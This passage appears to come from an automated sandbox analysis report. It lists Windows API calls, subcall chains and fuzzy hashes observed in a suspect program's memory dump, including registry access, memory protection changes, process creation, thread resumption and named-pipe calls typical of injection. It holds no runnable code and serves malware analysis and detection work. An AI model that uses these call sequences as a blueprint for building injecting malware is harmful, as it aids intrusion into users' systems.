                                                              • Part of subcall function 04BAAB88: lstrlen.KERNEL32(00000000,00000000,00000000,00000027,00000000,?,00000000,?,69B25F44,00000000,00000000,00000000), ref: 04BAABBE
                                                              • Part of subcall function 04BAAB88: lstrcpy.KERNEL32(00000000,00000000), ref: 04BAABE2
                                                              • Part of subcall function 04BAAB88: lstrcat.KERNEL32(00000000,00000000), ref: 04BAABEA
                                                            • RegOpenKeyExA.KERNEL32(04BBAB63,00000000,00000000,00020119,80000001,00000000,?,00000000,?,00000000,?,04BBAB63,80000001,?,04BB22F6), ref: 04BBABC2
                                                            • RegOpenKeyExA.ADVAPI32(04BBAB63,04BBAB63,00000000,00020019,80000001,?,04BBAB63,80000001,?,04BB22F6), ref: 04BBABD8
                                                            • RegCloseKey.ADVAPI32(80000001,80000001,?,04BB22F6,04BB2306,?,04BBAB63,80000001,?,04BB22F6), ref: 04BBAC21
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: Open$Closelstrcatlstrcpylstrlen
                                                            • String ID:
                                                            • API String ID: 4131162436-0
                                                            • Opcode ID: dea0da118ef77e0a54882b79e81065f73e95d8bf764e9d9caca13ec7f342aacc
                                                            • Instruction ID: 28d9c64960158862d2f57fa6758d2c0e4c89e76f04c11d03efeaae984dbbad48
                                                            • Opcode Fuzzy Hash: dea0da118ef77e0a54882b79e81065f73e95d8bf764e9d9caca13ec7f342aacc
                                                            • Instruction Fuzzy Hash: D5211D75A00209BFDB11DF95DCC1CEEBBBDEB4C214B1440AAEA44E3111E774AE55DBA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • RegCreateKeyA.ADVAPI32(80000001,05C8A7F0,?), ref: 04BC174B
                                                            • RegOpenKeyA.ADVAPI32(80000001,05C8A7F0,?), ref: 04BC1755
                                                            • lstrlen.KERNEL32(05C8A7F0,00000000,00000000,00000000,?,04BB68CE,00000000,00000000,00000001,73B74D40,04BB5AB0,04BB5AB0,?,04BA74AD,?,04BB5AB0), ref: 04BC1774
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: CreateOpenlstrlen
                                                            • String ID:
                                                            • API String ID: 2865187142-0
                                                            • Opcode ID: ac0861311e17684087ac1f41b95419f50f86956b0315974c87e93a7c7eb6eda1
                                                            • Instruction ID: 8d50f2dafc7967b08f9673774e4a69ca054da445e2c0fb466c615afb481bda33
                                                            • Opcode Fuzzy Hash: ac0861311e17684087ac1f41b95419f50f86956b0315974c87e93a7c7eb6eda1
                                                            • Instruction Fuzzy Hash: C2F062B6144208BFEB119F94DCC5EAA7B6CEB46364F10404AFE4596140E670AA44CB60
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • SetEvent.KERNEL32(00000404,04BAD1D5), ref: 04BC3A7A
                                                              • Part of subcall function 04BA6975: SleepEx.KERNEL32(00000064,00000001,00000000,?,?,?,04BC3A85), ref: 04BA699E
                                                              • Part of subcall function 04BA6975: RtlDeleteCriticalSection.NTDLL(04BCC2E0), ref: 04BA69D1
                                                              • Part of subcall function 04BA6975: RtlDeleteCriticalSection.NTDLL(04BCC300), ref: 04BA69D8
                                                              • Part of subcall function 04BA6975: CloseHandle.KERNEL32(?,?,04BC3A85), ref: 04BA6A07
                                                              • Part of subcall function 04BA6975: ReleaseMutex.KERNEL32(00000428,00000000,?,?,?,04BC3A85), ref: 04BA6A18
                                                              • Part of subcall function 04BA6975: CloseHandle.KERNEL32(?,?,04BC3A85), ref: 04BA6A24
                                                              • Part of subcall function 04BA6975: ResetEvent.KERNEL32(00000000,00000000,?,?,?,04BC3A85), ref: 04BA6A30
                                                              • Part of subcall function 04BA6975: CloseHandle.KERNEL32(?,?,04BC3A85), ref: 04BA6A3C
                                                              • Part of subcall function 04BA6975: SleepEx.KERNEL32(00000064,00000001,00000000,?,?,?,04BC3A85), ref: 04BA6A42
                                                              • Part of subcall function 04BA6975: SleepEx.KERNEL32(00000064,00000001,?,?,04BC3A85), ref: 04BA6A56
                                                              • Part of subcall function 04BA6975: HeapFree.KERNEL32(00000000,00000000,?,?,04BC3A85), ref: 04BA6A79
                                                              • Part of subcall function 04BA6975: RtlRemoveVectoredExceptionHandler.NTDLL(050305B8), ref: 04BA6AB2
                                                            • CloseHandle.KERNEL32(00000404), ref: 04BC3A8F
                                                            • HeapDestroy.KERNELBASE(05890000), ref: 04BC3A9F
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: CloseHandle$Sleep$CriticalDeleteEventHeapSection$DestroyExceptionFreeHandlerMutexReleaseRemoveResetVectored
                                                            • String ID:
                                                            • API String ID: 1636361345-0
                                                            • Opcode ID: 605628de441c9e777f52e5c5fc3e087685c10701e5e2f91d3b4937a03519c69b
                                                            • Instruction ID: f265fa5d02d1c5c2b407cffd7d9f5eebde677ecf270801a324515dc8eba8eb4e
                                                            • Opcode Fuzzy Hash: 605628de441c9e777f52e5c5fc3e087685c10701e5e2f91d3b4937a03519c69b
                                                            • Instruction Fuzzy Hash: 0EE042B07003019FAB149F76E8CCA1A37F8FA1D641399945ABA55E7140EA28E8228A34
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 04BC1736: RegCreateKeyA.ADVAPI32(80000001,05C8A7F0,?), ref: 04BC174B
                                                              • Part of subcall function 04BC1736: lstrlen.KERNEL32(05C8A7F0,00000000,00000000,00000000,?,04BB68CE,00000000,00000000,00000001,73B74D40,04BB5AB0,04BB5AB0,?,04BA74AD,?,04BB5AB0), ref: 04BC1774
                                                            • RegQueryValueExA.KERNEL32(04BA81F8,00000000,00000000,?,04BCB06C,?,00000001,04BA81F8,00000001,00000000,73B74D40,?,?,?,00000000,04BA81F8), ref: 04BA9A73
                                                            • RegCloseKey.ADVAPI32(04BA81F8,?,?,?,00000000,04BA81F8), ref: 04BA9ABE
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: CloseCreateQueryValuelstrlen
                                                            • String ID:
                                                            • API String ID: 971780412-0
                                                            • Opcode ID: 29fab205bb75c868ac86f519c0e55b9ba89579428826bf03a84ed111b869efc7
                                                            • Instruction ID: 2c8e00e0721ca5388a676cbc8e4004f8df254281a844a20e35d7967daf9989be
                                                            • Opcode Fuzzy Hash: 29fab205bb75c868ac86f519c0e55b9ba89579428826bf03a84ed111b869efc7
                                                            • Instruction Fuzzy Hash: 1B3148B1D04219EFDB21DFA5E8C19AEBBB8FB08750F0045ABE914A3250D7746E51DFA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 04BC3C35: RtlAllocateHeap.NTDLL(00000000,?,04BC0BE2), ref: 04BC3C41
                                                            • EnumProcessModules.PSAPI(00000008,00000000,00001000,00000000,00001000,04BCB7A0,-0000000C,00000000,00000000), ref: 04BC28E5
                                                            • GetLastError.KERNEL32(00000008,00000000,00001000,00000000,00001000,04BCB7A0,-0000000C,00000000), ref: 04BC292C
                                                              • Part of subcall function 04BC3C4A: RtlFreeHeap.NTDLL(00000000,?,04BA30B5,00000000,?,00000104,04BC0BF9,?,00000250,?,00000000), ref: 04BC3C56
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: Heap$AllocateEnumErrorFreeLastModulesProcess
                                                            • String ID:
                                                            • API String ID: 552344955-0
                                                            • Opcode ID: 9a6c649369ce2730fa5ec174e9eb5782fe24875288ea9afe2315248384a316e7
                                                            • Instruction ID: 71462558c73cc14980eb6af7249702601b297e683199fad5f5861a6031bdd520
                                                            • Opcode Fuzzy Hash: 9a6c649369ce2730fa5ec174e9eb5782fe24875288ea9afe2315248384a316e7
                                                            • Instruction Fuzzy Hash: EA118271D00308ABD7159FA9D8C4BAEBBF8EF95755F5080EDE801A7240DBB4AA01CB60
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 04BC1736: RegCreateKeyA.ADVAPI32(80000001,05C8A7F0,?), ref: 04BC174B
                                                              • Part of subcall function 04BC1736: lstrlen.KERNEL32(05C8A7F0,00000000,00000000,00000000,?,04BB68CE,00000000,00000000,00000001,73B74D40,04BB5AB0,04BB5AB0,?,04BA74AD,?,04BB5AB0), ref: 04BC1774
                                                            • RegQueryValueExA.KERNEL32(?,?,00000000,?,?,00000000,00000001,?,00000001,00000000), ref: 04BB9E68
                                                            • RegCloseKey.ADVAPI32(?), ref: 04BB9EBC
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: CloseCreateQueryValuelstrlen
                                                            • String ID:
                                                            • API String ID: 971780412-0
                                                            • Opcode ID: 7ed1068de05b66fef7d1dbe449807102ac7b92ff4b10d0a4d290863bfd4adb11
                                                            • Instruction ID: 7aeec38ea88e1f2dc62bdcec0f95a01830af2677fb9fe6bbb47b60c76438e37a
                                                            • Opcode Fuzzy Hash: 7ed1068de05b66fef7d1dbe449807102ac7b92ff4b10d0a4d290863bfd4adb11
                                                            • Instruction Fuzzy Hash: 10110D71900218EFEF10DFA5DC85FEEBBB8EB48714F1004A6EA44B7150D774AA45DBA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,04BA81F3,69B25F44,?,?,00000000), ref: 04BB5A84
                                                            • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,04BA81F3), ref: 04BB5AE5
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: Time$FileFreeHeapSystem
                                                            • String ID:
                                                            • API String ID: 892271797-0
                                                            • Opcode ID: 5ec23872e9cb0b0fd45e770934c1048bfb16099cf5a9bdeef55d974a1ece1480
                                                            • Instruction ID: 54a83733751fa8ae027705f16beb8be9c98ea4f79d2787c66239d0ba37159fe8
                                                            • Opcode Fuzzy Hash: 5ec23872e9cb0b0fd45e770934c1048bfb16099cf5a9bdeef55d974a1ece1480
                                                            • Instruction Fuzzy Hash: 1E11FBB5901108FBDF10DBA4D984AEE77B8EB08309F100492A545F7150DB78BA54DF61
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • RtlEnterCriticalSection.NTDLL(04BCC300), ref: 04BACFC4
                                                            • RtlLeaveCriticalSection.NTDLL(04BCC300), ref: 04BAD000
                                                              • Part of subcall function 04BA2577: lstrlen.KERNEL32(?,?,00000000,?,04BB8E6F,00000000,00000001,?,00000000,00000000,00000000,04BCB928,00000001), ref: 04BA25C4
                                                              • Part of subcall function 04BA2577: VirtualProtect.KERNEL32(00000000,00000000,00000040,00000200,?,00000000,?,04BB8E6F,00000000,00000001,?,00000000,00000000,00000000,04BCB928,00000001), ref: 04BA25D6
                                                              • Part of subcall function 04BA2577: lstrcpy.KERNEL32(00000000,?), ref: 04BA25E5
                                                              • Part of subcall function 04BA2577: VirtualProtect.KERNEL32(00000000,00000000,00000200,00000200,?,00000000,?,04BB8E6F,00000000,00000001,?,00000000,00000000,00000000,04BCB928,00000001), ref: 04BA25F6
                                                              • Part of subcall function 04BC3C4A: RtlFreeHeap.NTDLL(00000000,?,04BA30B5,00000000,?,00000104,04BC0BF9,?,00000250,?,00000000), ref: 04BC3C56
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: CriticalProtectSectionVirtual$EnterFreeHeapLeavelstrcpylstrlen
                                                            • String ID:
                                                            • API String ID: 1872894792-0
                                                            • Opcode ID: cdcd791d3c70e3bb8c2389743c3ae62a1286b97fe6dda85631fe2602fa59d212
                                                            • Instruction ID: f3e3cde93be3fab80aaaeb4b7d82f9c2156dbef4dcae263d3cdb005ef1842852
                                                            • Opcode Fuzzy Hash: cdcd791d3c70e3bb8c2389743c3ae62a1286b97fe6dda85631fe2602fa59d212
                                                            • Instruction Fuzzy Hash: 99F0EC766052159F87206F58E4C4C39FFB8FB9951530501CFE91AB7310CA767C11C6D0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • InterlockedIncrement.KERNEL32(04BCBFFC), ref: 04BA26F7
                                                              • Part of subcall function 04BA1305: GetSystemTimeAsFileTime.KERNEL32(?), ref: 04BA1330
                                                              • Part of subcall function 04BA1305: HeapCreate.KERNEL32(00000000,00400000,00000000), ref: 04BA133D
                                                              • Part of subcall function 04BA1305: NtQueryInformationThread.NTDLL(000000FE,00000009,?,00000004,?), ref: 04BA13C9
                                                              • Part of subcall function 04BA1305: GetModuleHandleA.KERNEL32(00000000), ref: 04BA13D4
                                                              • Part of subcall function 04BA1305: RtlImageNtHeader.NTDLL(00000000), ref: 04BA13DD
                                                              • Part of subcall function 04BA1305: RtlExitUserThread.NTDLL(00000000), ref: 04BA13F2
                                                            • InterlockedDecrement.KERNEL32(04BCBFFC), ref: 04BA271B
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: InterlockedThreadTime$CreateDecrementExitFileHandleHeaderHeapImageIncrementInformationModuleQuerySystemUser
                                                            • String ID:
                                                            • API String ID: 1011034841-0
                                                            • Opcode ID: 7e82a4a6e7029a507cc88209b26a1ad6a248388d1637b7a7e3873bb90d357d99
                                                            • Instruction ID: 425ed050986e8a8fae3cafcd9c63932c0da48d703934cec8d337e4377f9d873f
                                                            • Opcode Fuzzy Hash: 7e82a4a6e7029a507cc88209b26a1ad6a248388d1637b7a7e3873bb90d357d99
                                                            • Instruction Fuzzy Hash: DEE0123120C12167971E5E7598C4B6E7791FB547C1F0045D9F542D1260E610FE608B91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 04BBB94E: VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 04BBB987
                                                              • Part of subcall function 04BBB94E: VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,00000000,?,?), ref: 04BBB9BD
                                                              • Part of subcall function 04BBB94E: VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 04BBB9C9
                                                              • Part of subcall function 04BBB94E: lstrcmpi.KERNEL32(?,00000000), ref: 04BBBA06
                                                              • Part of subcall function 04BBB94E: StrChrA.SHLWAPI(?,0000002E), ref: 04BBBA0F
                                                              • Part of subcall function 04BBB94E: lstrcmpi.KERNEL32(?,00000000), ref: 04BBBA21
                                                              • Part of subcall function 04BBB94E: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 04BBBA72
                                                            • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,00000010,?,?,?,04BC85A0,0000002C,04BA9E85,05C88E6E,?,00000000,04BB765C), ref: 04BA15FC
                                                              • Part of subcall function 04BA6EB0: GetProcAddress.KERNEL32(?,00000000), ref: 04BA6ED9
                                                              • Part of subcall function 04BA6EB0: NtWow64ReadVirtualMemory64.NTDLL(00000100,?,?,00000028,00000000,00000000,00000100,00000000,?,?,?,04BA9375,00000000,00000000,00000028,00000100), ref: 04BA6EFB
                                                            • VirtualFree.KERNELBASE(?,00000000,00008000,00000010,?,?,?,04BC85A0,0000002C,04BA9E85,05C88E6E,?,00000000,04BB765C,?,00000318), ref: 04BA1687
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: Virtual$AllocFree$lstrcmpi$AddressMemory64ProcReadWow64
                                                            • String ID:
                                                            • API String ID: 4138075514-0
                                                            • Opcode ID: f831deecb6de27cc7e9abbc8ac197efdbbb98e77a39e5fc84551a5d564cd0c03
                                                            • Instruction ID: 74e19c3d701f141bdd4588cdc69646c8876f9f92dd750ea58a6c0001110ca2a9
                                                            • Opcode Fuzzy Hash: f831deecb6de27cc7e9abbc8ac197efdbbb98e77a39e5fc84551a5d564cd0c03
                                                            • Instruction Fuzzy Hash: D4211571D01228EFCF619FA9CC80ADEBBB5FF08720F18816AE914B6150C3746A51CFA4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetModuleHandleA.KERNEL32(?,00000001,00000000,73B74D40,?,?,00000000,04BA81E2), ref: 04BBA4FE
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: HandleModule
                                                            • String ID:
                                                            • API String ID: 4139908857-0
                                                            • Opcode ID: 780510a620ffd435240a5abf5e9c360bed217682ca98f934117ba1114de159de
                                                            • Instruction ID: bc28029087ad0a12111544f77b4e69575d066d59526d65100973e856c774735e
                                                            • Opcode Fuzzy Hash: 780510a620ffd435240a5abf5e9c360bed217682ca98f934117ba1114de159de
                                                            • Instruction Fuzzy Hash: 5D311A72E44208EFDB10DF99D8C19ADBBB5FB4C324B5580EAD645AB200D674BE41CBA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetModuleHandleA.KERNEL32(04BBC493,04BCB7A0,-0000000C,00000000,?,?,04BBC495,0000000C,00000000,?), ref: 04BAA081
                                                              • Part of subcall function 04BB0FA5: NtQueryInformationProcess.NTDLL(00000000,00000402,00000018,00000000,04BCC300), ref: 04BB0FBC
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false

                                                            APIs
                                                            • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 04BB180E
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false

                                                            APIs
                                                              • Part of subcall function 04BAC5E7: GetProcessImageFileNameW.PSAPI(?,00000000,00000800,00001000,04BCC140,00000000,04BAAD03,?,04BAD280,?), ref: 04BAC606
                                                              • Part of subcall function 04BAC5E7: PathFindFileNameW.SHLWAPI(00000000,?,?,00000000,00000800,00001000,04BCC140,00000000,04BAAD03,?,04BAD280,?), ref: 04BAC611
                                                              • Part of subcall function 04BAC5E7: _wcsupr.NTDLL ref: 04BAC61E
                                                              • Part of subcall function 04BAC5E7: lstrlenW.KERNEL32(00000000), ref: 04BAC626
                                                            • ResumeThread.KERNEL32(00000004,?,04BAD280,?), ref: 04BAAD11
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false

                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 04BC466A
                                                              • Part of subcall function 04BC477A: RaiseException.KERNEL32(C06D0057,00000000,00000001,00000000,?,0002858C,04BA0000), ref: 04BC47F3
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false

                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 04BC466A
                                                              • Part of subcall function 04BC477A: RaiseException.KERNEL32(C06D0057,00000000,00000001,00000000,?,0002858C,04BA0000), ref: 04BC47F3
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false

                                                            APIs
                                                            • RtlAllocateHeap.NTDLL(00000000,?,04BC0BE2), ref: 04BC3C41
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false

                                                            APIs
                                                            • RtlFreeHeap.NTDLL(00000000,?,04BA30B5,00000000,?,00000104,04BC0BF9,?,00000250,?,00000000), ref: 04BC3C56
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false

                                                            APIs
                                                              • Part of subcall function 04BB68B2: RegQueryValueExA.KERNEL32(00000000,04BB5AB0,00000000,04BB5AB0,00000000,?,00000000,00000000,00000000,00000001,73B74D40,04BB5AB0,04BB5AB0,?,04BA74AD,?), ref: 04BB68EA
                                                              • Part of subcall function 04BB68B2: RtlAllocateHeap.NTDLL(00000000,?), ref: 04BB68FE
                                                              • Part of subcall function 04BB68B2: RegQueryValueExA.ADVAPI32(00000000,04BB5AB0,00000000,04BB5AB0,00000000,?,?,04BA74AD,?,04BB5AB0,00000000,00000001,00000000,73B74D40), ref: 04BB6918
                                                              • Part of subcall function 04BB68B2: RegCloseKey.ADVAPI32(00000000,?,04BA74AD,?,04BB5AB0,00000000,00000001,00000000,73B74D40,?,?,?,04BB5AB0,00000000), ref: 04BB6942
                                                            • HeapFree.KERNEL32(00000000,04BB5AB0,00000000,?,04BB5AB0,00000000,00000001,00000000,73B74D40,?,?,?,04BB5AB0,00000000), ref: 04BA7521
                                                              • Part of subcall function 04BA96CA: memcpy.NTDLL(04BB5AB0,04BB5AB0,00000000,04BB5AB0,04BB5AB0,04BB5AB0,?,?,?,04BA74D8,00000000,00000001,00000000,?,04BB5AB0,00000000), ref: 04BA96ED
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false

                                                            APIs
                                                            • memcpy.NTDLL(?,04BCC214,00000018,04BB98AB,05C88E6E,?,04BB98AB,05C88E6E,?,04BB98AB,05C88E6E,?,?,?,?,04BB98AB), ref: 04BC3C23
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false

                                                            APIs
                                                              • Part of subcall function 04BB68B2: RegQueryValueExA.KERNEL32(00000000,04BB5AB0,00000000,04BB5AB0,00000000,?,00000000,00000000,00000000,00000001,73B74D40,04BB5AB0,04BB5AB0,?,04BA74AD,?), ref: 04BB68EA
                                                              • Part of subcall function 04BB68B2: RtlAllocateHeap.NTDLL(00000000,?), ref: 04BB68FE
                                                              • Part of subcall function 04BB68B2: RegQueryValueExA.ADVAPI32(00000000,04BB5AB0,00000000,04BB5AB0,00000000,?,?,04BA74AD,?,04BB5AB0,00000000,00000001,00000000,73B74D40), ref: 04BB6918
                                                              • Part of subcall function 04BB68B2: RegCloseKey.ADVAPI32(00000000,?,04BA74AD,?,04BB5AB0,00000000,00000001,00000000,73B74D40,?,?,?,04BB5AB0,00000000), ref: 04BB6942
                                                            • HeapFree.KERNEL32(00000000,00000000,00000000,1D4E36C0,?,00000000,?,?,?,00000000,04BA83C0,04BAD17E,00000000,00000000), ref: 04BC39FD
                                                              • Part of subcall function 04BACB3E: StrChrA.SHLWAPI(1D4E36C0,0000002E,00000000,00000000,?,1D4E36C0,04BBDBAB,00000000,00000000,00000000), ref: 04BACB50
                                                              • Part of subcall function 04BACB3E: StrChrA.SHLWAPI(00000004,00000020,?,1D4E36C0,04BBDBAB,00000000,00000000,00000000), ref: 04BACB5F
                                                              • Part of subcall function 04BBAE65: CloseHandle.KERNEL32(00000001,?,00000000,00000000,00000000,00000000,00000000,73BCF5B0,04BA824E,?,00000001), ref: 04BBAE8B
                                                              • Part of subcall function 04BBAE65: CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 04BBAE97
                                                              • Part of subcall function 04BBAE65: GetModuleHandleA.KERNEL32(?,05C89732,?,00000000,00000000), ref: 04BBAEB7
                                                              • Part of subcall function 04BBAE65: GetProcAddress.KERNEL32(00000000), ref: 04BBAEBE
                                                              • Part of subcall function 04BBAE65: Thread32First.KERNEL32(00000001,0000001C), ref: 04BBAECE
                                                              • Part of subcall function 04BBAE65: CloseHandle.KERNEL32(00000001), ref: 04BBAF16
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false

                                                            APIs
                                                              • Part of subcall function 04BB68B2: RegQueryValueExA.KERNEL32(00000000,04BB5AB0,00000000,04BB5AB0,00000000,?,00000000,00000000,00000000,00000001,73B74D40,04BB5AB0,04BB5AB0,?,04BA74AD,?), ref: 04BB68EA
                                                              • Part of subcall function 04BB68B2: RtlAllocateHeap.NTDLL(00000000,?), ref: 04BB68FE
                                                              • Part of subcall function 04BB68B2: RegQueryValueExA.ADVAPI32(00000000,04BB5AB0,00000000,04BB5AB0,00000000,?,?,04BA74AD,?,04BB5AB0,00000000,00000001,00000000,73B74D40), ref: 04BB6918
                                                              • Part of subcall function 04BB68B2: RegCloseKey.ADVAPI32(00000000,?,04BA74AD,?,04BB5AB0,00000000,00000001,00000000,73B74D40,?,?,?,04BB5AB0,00000000), ref: 04BB6942
                                                            • HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,00000000,04BA83BB,04BAD17E,00000000,00000000), ref: 04BBDBC5
                                                              • Part of subcall function 04BACB3E: StrChrA.SHLWAPI(1D4E36C0,0000002E,00000000,00000000,?,1D4E36C0,04BBDBAB,00000000,00000000,00000000), ref: 04BACB50
                                                              • Part of subcall function 04BACB3E: StrChrA.SHLWAPI(00000004,00000020,?,1D4E36C0,04BBDBAB,00000000,00000000,00000000), ref: 04BACB5F
                                                              • Part of subcall function 04BAA6F7: lstrlen.KERNEL32(04BA47C4,00000000,00000000,?,?,?,04BA47C4,00000035,00000000,-00000005,00000000), ref: 04BAA727
                                                              • Part of subcall function 04BAA6F7: RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 04BAA73D
                                                              • Part of subcall function 04BAA6F7: memcpy.NTDLL(00000010,04BA47C4,00000000,?,?,04BA47C4,00000035,00000000), ref: 04BAA773
                                                              • Part of subcall function 04BAA6F7: memcpy.NTDLL(00000010,00000000,00000035,?,?,04BA47C4,00000035), ref: 04BAA78E
                                                              • Part of subcall function 04BAA6F7: CallNamedPipeA.KERNEL32(00000000,00000000,?,00000010,00000028,00000001), ref: 04BAA7AC
                                                              • Part of subcall function 04BAA6F7: GetLastError.KERNEL32(?,?,04BA47C4,00000035), ref: 04BAA7B6
                                                              • Part of subcall function 04BAA6F7: HeapFree.KERNEL32(00000000,00000000,?,?,04BA47C4,00000035), ref: 04BAA7D9
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false

                                                            APIs
                                                              • Part of subcall function 04BC3C35: RtlAllocateHeap.NTDLL(00000000,?,04BC0BE2), ref: 04BC3C41
                                                            • memset.NTDLL ref: 04BABF5D
                                                              • Part of subcall function 04BB7629: memset.NTDLL ref: 04BB764F
                                                              • Part of subcall function 04BB7629: memcpy.NTDLL ref: 04BB7677
                                                              • Part of subcall function 04BB7629: GetLastError.KERNEL32(00000010,00000218,04BC4EAD,00000100,?,00000318,00000008), ref: 04BB768E
                                                              • Part of subcall function 04BB7629: GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,04BC4EAD,00000100), ref: 04BB7771
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false

                                                            APIs
                                                            • memset.NTDLL ref: 04BBAB4B
                                                              • Part of subcall function 04BBAB7B: RegOpenKeyExA.KERNEL32(04BBAB63,00000000,00000000,00020119,80000001,00000000,?,00000000,?,00000000,?,04BBAB63,80000001,?,04BB22F6), ref: 04BBABC2
                                                              • Part of subcall function 04BBAB7B: RegOpenKeyExA.ADVAPI32(04BBAB63,04BBAB63,00000000,00020019,80000001,?,04BBAB63,80000001,?,04BB22F6), ref: 04BBABD8
                                                              • Part of subcall function 04BBAB7B: RegCloseKey.ADVAPI32(80000001,80000001,?,04BB22F6,04BB2306,?,04BBAB63,80000001,?,04BB22F6), ref: 04BBAC21
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false

                                                            APIs
                                                            • VirtualFree.KERNELBASE(?,00000000,00008000,00000010,?,?,?,04BC85A0,0000002C,04BA9E85,05C88E6E,?,00000000,04BB765C,?,00000318), ref: 04BA1687
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false

                                                            Non-executed Functions

                                                            APIs
                                                            • StrToIntExA.SHLWAPI(00000000,00000000,00000000,00000001,00000000,73B74D40,?,?,04BB5ADA,00000000,00000000,?,?,00000000,04BA81F3), ref: 04BB468E
                                                            • StrToIntExA.SHLWAPI(00000000,00000000,00000000,00000001,00000000,73B74D40,?,?,04BB5ADA,00000000,00000000,?,?,00000000,04BA81F3), ref: 04BB46C0
                                                            • StrToIntExA.SHLWAPI(00000000,00000000,00000000,00000001,00000000,73B74D40,?,?,04BB5ADA,00000000,00000000,?,?,00000000,04BA81F3), ref: 04BB46F2
